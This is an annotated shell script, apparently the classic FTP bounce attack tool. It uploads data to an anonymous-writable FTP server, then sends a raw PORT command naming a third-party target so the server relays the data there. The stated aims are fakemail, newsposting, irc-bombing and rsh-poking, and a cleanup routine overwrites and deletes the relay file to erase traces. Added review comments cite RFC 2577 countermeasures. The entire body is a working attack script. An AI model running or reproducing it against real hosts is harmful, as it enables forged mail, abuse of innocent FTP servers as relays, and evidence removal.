#! /bin/sh
# Whang stdin thru an FTP site to a target.  Implements the Bounce Attack
# for fakemail, newsposting, irc-bombing, rsh-poking, or anything else
# involving transfer of data *to* the target host.

# REQUIRES::
# stdin: contents; temporarily assembled in /tmp/.i<pid>
# /tmp/filler: 256 lines of 250 nulls each; about 64k worth
# ARGS::
# target site: name or IP [hopefully nslookup will deal]
# target port: numeric; this handles generating hibyte,lobyte
# bounce site: ideally, non-WU with writeable dirs and no identd???
# bounce file: *full path* of w-file over there; this DTRTs with the name
# option:
#	blank -> create, bounce, reconnect and delete
#	c -> create it, bounce it, but don't delete just yet
#	y -> it's already there, just re-bounce it and don't delete
#	d -> don't transfer anything, just delete [for cleanup]

# Argument check: four positional arguments are mandatory (target site,
# target port, bounce site, bounce file); $5, the action flag, is optional.
# Only the presence of $4 is tested; none of the values is validated.
test "$4" = "" && echo "Bad args, read the script" && exit 1
# The padding file is not generated by this script; it must already exist as
# a regular file at this fixed path.
test ! -f /tmp/filler && echo "Cant find /tmp/filler; construct it!" && exit 1

# Local staging file for the data read from stdin, named after the shell's pid.
# NOTE(review): the name is predictable and sits in a world-writable
# directory, and the script later writes to it with plain ">" redirects, which
# follow symlinks.  On a multi-user host another local user can pre-create or
# symlink this path; mktemp(1) is the usual way to avoid that.
TNAME=/tmp/.i$$

# construct necessaries for PORT commands
# The FTP PORT argument is six comma-separated decimal bytes: the four bytes
# of the IPv4 address, then the port as high byte and low byte.
# In dc, "0 k" sets the precision to 0, so "/" is integer division:
#   TPORTH = port / 256
#   TPORTL = port - (port / 256) * 256
# NOTE(review): $2 is pasted into the dc program as-is; nothing here checks
# that it is a number in the range 0-65535.
TPORTH=`echo "0 k $2 256 / p q" | dc`
TPORTL=`echo "0 k $2 d 256 / 256 * - p q" | dc`
# "host" is pretty common these days; try it...
# Takes the first "has address" line, keeps only the text after the last
# blank or tab (the dotted quad), and turns the dots into commas.
# If the lookup prints no such line, THOST is empty and TARGET below starts
# with a bare comma; the script does not check for that.
THOST=`host -t a "${1}" | fgrep 'has address '| head -1 | \
  sed -e 's/.*[	 ]//' -e 's/\./,/g'`
# if you can't find "host", this works but loses for multihomed machines.
# THOST=`nslookup -query=a "${1}" | tail +3 | grep 'ddress:' | \
#   sed -e 's/.*[	 ]//' -e 's/\./,/g'`
# Full six-field PORT argument: h1,h2,h3,h4,p1,p2
TARGET="${THOST},${TPORTH},${TPORTL}"

# split filespec into dir/file
# FDIR is everything before the last "/" of $4, FFILE everything after it.
# If $4 contains no "/" the first sed expression does not match, so FDIR ends
# up equal to the whole of $4; the header asks for a full path for this reason.
FDIR=`echo "${4}" | sed 's/\(.*\)\/.*/\1/'`
FFILE=`echo "${4}" | sed 's/.*\///'`

# select actions by various preloads.  $5 is our action-flag...
# An empty flag is treated as "c" (create and bounce) for now.  Further down
# the script tests $5 again and, when it was empty, switches XARG to "d" so
# that the delete handler also runs in the same invocation.
XARG="${5}"
if test "$5" = "" ; then
  XARG='c'
fi

# Construct the dirty, ship it over and forward to target.  We don't delete
# yet because many ftp servers crash when the retr-to-target fails in weird
# ways, and we might want to keep the file around for a bit... Take out "ascii"
# line if need be
#
# What this branch does, in order:
#   1. concatenates stdin and /tmp/filler into the local staging file;
#   2. logs in to the bounce site ($3) as anonymous user "ftp" and changes to
#      $FDIR ("quo" is the ftp client's abbreviation of "quote", which sends
#      the quoted text to the server as a raw command);
#   3. uploads the staging file as $FFILE in binary mode;
#   4. switches to ascii, sends a raw PORT command carrying the *target's*
#      address and port, then RETR, so the server is asked to deliver the file
#      over a data connection to that third-party endpoint.
# The heredoc delimiter is unquoted, so the shell expands $3, $FDIR, $TNAME,
# $FFILE and $TARGET before ftp reads the text; the arguments are inserted
# unvalidated.  The exit status of ftp is not checked.
#
# NOTE(defense): step 4 depends on the server honouring a PORT command whose
# address is not the address of the control connection's peer.  RFC 2577
# (FTP Security Considerations) describes the countermeasures: the server
# refuses PORT commands that name another host or a port below 1024.  Where
# the server logs commands, a PORT address that differs from the client
# address is the signal to look for; anonymous-writable directories are the
# other precondition visible in this sequence.
if test "$XARG" = "c" ; then
  echo sending $TNAME to $TARGET via $3 : $FDIR / $FFILE >&2
  cat - /tmp/filler > $TNAME
  ftp -n << EOF
  open $3
  prompt
  quo "user ftp"
  quo "pass -root@"
  cd $FDIR
  binary
  put $TNAME $FFILE
  ascii
  quo "PORT $TARGET"
  quo "RETR $FFILE"
EOF
fi

# re-whang handler, called only if xarg is "y"
# Same PORT/RETR sequence as the create branch, minus the upload: it assumes
# $FFILE is already present in $FDIR on the bounce site and reads nothing
# from stdin.  Variables in the heredoc are expanded by the shell because the
# delimiter is unquoted.
# NOTE(defense): as in the create branch, the PORT command names a host other
# than the client; a server that rejects third-party PORT addresses (see
# RFC 2577) refuses this request.
test "$XARG" = "y" && ftp -n << EOF
  open $3
  prompt
  quo "user ftp"
  quo "pass -root@"
  cd $FDIR
  ascii
  quo "PORT $TARGET"
  quo "RETR $FFILE"
EOF

# With no action flag given, the create branch above has already run with
# XARG='c'; switch to 'd' now so the delete handler below runs as well
# (the "blank" option described in the header).
if test "${5}" = "" ; then
  XARG='d'
fi

# delete handler.  A bit fancy 'cause some servers disallow delete and/or
# rename, and some allow rename even though they thought otherwise, heh heh.
# In any case, make damn sure the thing is gonzo.
#
# Sequence: the local staging file is overwritten with the single line "test"
# and uploaded over both $FFILE and x$FFILE, so the earlier content is
# replaced even if the later commands are refused.  The file is then renamed
# x$FFILE -> $FFILE and $FFILE -> x$FFILE, and finally both names are deleted.
# Each rnfr is sent twice before its rnto; the script does not say why.
# No server reply is checked, so the script cannot tell whether the file was
# actually removed.
# NOTE(review): for whoever operates the FTP server, the overwrite-then-delete
# means the uploaded content may not be recoverable from the directory
# afterwards; transfer and command logs are the remaining record.
if test "$XARG" = "d" ; then
  echo "test" > $TNAME
  ftp -n << EOF
  open $3
  prompt
  quo "user ftp"
  quo "pass -root@"
  cd $FDIR
  put $TNAME ${FFILE}
  put $TNAME x${FFILE}
  quo "rnfr x${FFILE}"
  quo "rnfr x${FFILE}"
  quo "rnto $FFILE"
  quo "rnfr ${FFILE}"
  quo "rnfr ${FFILE}"
  quo "rnto x${FFILE}"
  del x${FFILE}
  del $FFILE
  quit
EOF
fi

# Local cleanup: remove the staging file if one was created, then flush
# filesystem buffers.
# The exit status is always 0, whatever happened in the ftp sessions above,
# so a caller cannot use it to detect failure.
test -f $TNAME && rm $TNAME
sync
exit 0
